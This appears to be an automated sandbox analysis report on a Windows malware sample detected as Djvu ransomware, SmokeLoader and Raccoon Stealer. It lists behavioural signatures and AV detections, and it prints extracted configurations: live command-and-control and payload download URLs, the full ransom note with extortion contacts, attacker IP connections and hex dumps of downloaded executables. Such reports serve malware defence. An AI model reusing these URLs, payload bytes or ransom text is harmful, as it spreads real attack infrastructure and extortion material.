Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 800784
MD5: 17a74a0281cefb5d9c29022fbc79981a
SHA1: d88585c6c9488b6d28b71dd0659edb8649e32dca
SHA256: 2814b2a02771e2d16ce2efb1586d8623b54b50d6e1c8dfa9ab2bbf54ab8b249d
Tags: exe, RecordBreaker

Detection

Djvu, Fabookie, Raccoon Stealer v2, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Yara detected Fabookie
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Machine Learning detection for sample
Injects a PE file into a foreign processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Detected VMProtect packer
Tries to steal Crypto Currency Wallets
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Connects to several IPs in different countries

Classification

AV Detection

Source: https://xv.yxzgamen.com/2701.html URL Reputation: Label: malware
Source: https://xv.yxzgamen.com/logo.png URL Reputation: Label: malware
Source: http://77.73.134.27/llpb1133.exe URL Reputation: Label: malware
Source: http://bihsy.com/lancer/get.php Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\98D7.exe Avira: detection malicious, Label: HEUR/AGEN.1210601
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe Avira: detection malicious, Label: HEUR/AGEN.1210601
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Avira: detection malicious, Label: HEUR/AGEN.1234960
Source: file.exe ReversingLabs: Detection: 48%
Source: file.exe Virustotal: Detection: 34%
Source: potunulit.org Virustotal: Detection: 16%
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\3046.exe ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\4113.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\98D7.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\ECFB.exe ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\XandETC.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\db.dll ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\pliu.exe ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Roaming\sievwvt ReversingLabs: Detection: 48%
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\12C0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FB61.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\98D7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ECFB.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sievwvt Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3046.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jhevwvt Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4113.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Joe Sandbox ML: detected
Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://bihsy.com/files/1/build3.exe"], "C2 url": "http://bihsy.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-8pCGyFnOj6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0641JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", 
"C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Window
Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}

Compliance

Source: C:\Users\user\AppData\Local\Temp\4113.exe Unpacked PE file: 11.2.4113.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3046.exe Unpacked PE file: 15.2.3046.exe.400000.0.unpack
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 158.69.96.67:443 -> 192.168.2.3:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.253.35:443 -> 192.168.2.3:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49721 version: TLS 1.2
Source: Binary string: C:\pewuhagedisene88\fafi.pdb source: explorer.exe, 00000004.00000003.361183875.0000000005940000.00000004.00000001.00020000.00000000.sdmp, 4113.exe, 0000000B.00000000.360714654.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: C:\hukesonu\cab71\kedir\81\zu.pdb source: D8D3.exe, 00000013.00000000.402009575.0000000000401000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb` source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: eFI,d(C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\min gaferovasomo\kimi wipeyumamu16\jigewenege.pdb source: explorer.exe, 00000004.00000003.365557509.000000000B700000.00000004.00000001.00020000.00000000.sdmp, 3046.exe, 0000000D.00000002.396339058.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000D.00000000.364021519.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000F.00000000.394852843.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000021.00000000.447684089.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000021.00000002.509435765.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000002.603085985.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000000.461163499.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000027.00000002.514112881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000027.00000000.466448303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: 3JC:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: d:\administrator\desktop\apphttp\release\apphttp.pdb source: pliu.exe, 0000001B.00000000.437990419.000000000040E000.00000002.00000001.01000000.00000014.sdmp, pliu.exe, 0000001B.00000002.467843346.000000000040E000.00000002.00000001.01000000.00000014.sdmp
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00428390 FindFirstFileExW, 11_2_00428390

Networking

Source: C:\Windows\explorer.exe Network Connect: 37.34.248.24 80
Source: C:\Windows\explorer.exe Domain query: perficut.at
Source: C:\Windows\explorer.exe Domain query: potunulit.org
Source: C:\Windows\explorer.exe Network Connect: 190.219.54.242 80
Source: C:\Windows\explorer.exe Network Connect: 23.106.124.133 80
Source: C:\Windows\explorer.exe Network Connect: 195.158.3.162 80
Source: C:\Windows\explorer.exe Network Connect: 158.69.96.67 443
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80
Source: C:\Windows\explorer.exe Network Connect: 77.73.134.27 80
Source: C:\Windows\explorer.exe Domain query: flytourchip.com.br
Source: Malware configuration extractor URLs: http://bihsy.com/lancer/get.php
Source: Malware configuration extractor URLs: http://bulimu55t.net/
Source: Malware configuration extractor URLs: http://soryytlic4.net/
Source: Malware configuration extractor URLs: http://bukubuka1.net/
Source: Malware configuration extractor URLs: http://novanosa5org.org/
Source: Malware configuration extractor URLs: http://hujukui3.net/
Source: Malware configuration extractor URLs: http://newzelannd66.org/
Source: Malware configuration extractor URLs: http://golilopaster.org/
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:44:50 GMTContent-Type: application/octet-streamContent-Length: 7722496Last-Modified: Tue, 07 Feb 2023 18:03:24 GMTConnection: keep-aliveETag: "63e2926c-75d600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c 92 e2 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 cc 75 00 00 08 00 00 00 00 00 00 9e ea 75 00 00 20 00 00 00 00 76 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 76 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 ea 75 00 53 00 00 00 00 00 76 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 76 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 ca 75 00 00 20 00 00 00 cc 75 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 04 00 00 00 00 76 00 00 06 00 00 00 ce 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 76 00 00 02 00 00 00 d4 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 ea 75 00 00 00 00 00 48 00 00 00 02 00 05 00 ec d4 75 00 5c 15 00 00 03 00 00 00 01 00 00 06 d8 27 00 00 14 ad 75 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:25 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:48 GMTETag: "62548404-1f29b8"Expires: Tue, 07 Feb 2023 19:15:25 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 
78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:26 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:42 GMTETag: "625483fe-6db00"Expires: Tue, 07 Feb 2023 19:15:26 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:27 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 21:52:46 GMTETag: "629299ae-13900"Expires: Tue, 07 Feb 2023 19:15:26 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 